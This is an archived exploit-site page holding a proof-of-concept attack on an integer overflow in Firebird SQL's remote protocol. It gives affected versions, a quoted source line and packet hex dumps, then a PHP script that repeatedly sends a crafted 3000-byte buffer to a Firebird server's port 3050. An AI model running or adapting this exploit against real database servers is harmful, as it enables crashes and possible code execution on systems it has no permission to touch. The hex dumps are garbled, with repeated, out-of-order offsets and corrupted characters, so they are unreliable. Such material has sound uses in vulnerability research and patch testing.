AOH :: HP Unsorted F :: BX2302.HTM

Firebird remote BOF POC



Firebird remote BOF POC
Firebird remote BOF POC



ITDEFENCE.ru

Firebird is a relational database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms.

(underwater@itdefence.ru)
 *
 *  Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0
 *  RC1 might allow remote attackers to execute arbitrary code via crafted op_receive, op_start, op_start_and_receive,
 *  op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR requests, which triggers memory corruption.
 *
 *  Vulnerable packages
 *
 *      Firebird SQL 1.0.3 and before.
 *      Firebird SQL 1.5.5 and before.
 *      Firebird SQL 2.0.3 and before.
 *      Firebird SQL 2.1.0 Beta 2 and before.
 *
 *  Non-vulnerable packages
 *
 *      Firebird SQL 1.5.6 (to be released)
 *      Firebird SQL 2.0.4 (to be released)
 *      Firebird SQL 2.1.0 RC1
 *
 *  src/remote/protocol.cpp:417
 *
 *      MAP(xdr_short, reinterpret_cast(data->p_data_request));
 *      MAP(xdr_short, reinterpret_cast(data->p_data_incarnation));
 *      MAP(xdr_short, reinterpret_cast(data->p_data_transaction));
 *      MAP(xdr_short, reinterpret_cast(data->p_data_message_number));
 *      return xdr_request(xdrs, data->p_data_request,
 *           data->p_data_message_number,
 *           data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
 *
 *  Firebird Connect Packet
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   ..............E.
* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8 .ј....@..%АЁ|cАЁ
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10   |c.к.=93........P.
* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00 @...............
 *  0x0040   00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F   ..........=93..ll@.?аАЁ|cАЁ
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10   |c.к.=93...=95....P.
* 0x0030 40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00 @...............
 *  0x0040   00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C   ..
 *  0x00A0   00 00                                             ..
 *
 */

    $___suntzu = "\x00\x00\x00\x4a" .  str_repeat( "\x4a" , 3000);
    for ($temp = 0; $temp < 5; $temp ++){
       $___zuntzu  =   fsockopen('192.168.124.99',3050);
       fwrite($___zuntzu , $___suntzu);
       fclose($___zuntzu );
       sleep(1);
    }

?>

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.